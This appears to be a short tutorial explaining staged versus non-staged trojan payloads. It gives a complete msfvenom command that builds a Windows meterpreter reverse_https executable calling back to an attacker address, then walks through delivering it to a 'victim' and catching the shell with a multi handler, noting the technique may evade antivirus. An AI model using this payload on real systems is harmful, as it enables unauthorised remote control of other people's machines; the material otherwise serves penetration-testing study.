Let’s see we have two types of trojans
Staged Payloads
Non Staged Payloads
the staged payloads is a type of malware in which if it run in the victim operating system it connects back to the attacker to download the other stage you may mark it as the bridge between the victim machine and the malicious code we wish to run on the victim machine and this type of malware have low size and once the stages is delivered it maybe written on the hard disk or run directly from the memory
as we see the /shell/ mean that this is a staged payload that contain a min amount of code that performs a callback then download the rest of code and execute it in the target memory (may evade anti virus programs)
For Example
let’s create a staged payload and notice everything
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.2.5 LPORT=443 -f exe -o staged.exe
as we see we created our staged payload with msfvenom so let’s transfer it to the victim machine
as we notice the size of the malware is 7kb which is really small because it only contains the necessary code that will execute a callback function to download the rest of the payload so let’s setup the multi handler before running it
now let’s run the malware
okay now we should go and check the multi handler to see the shell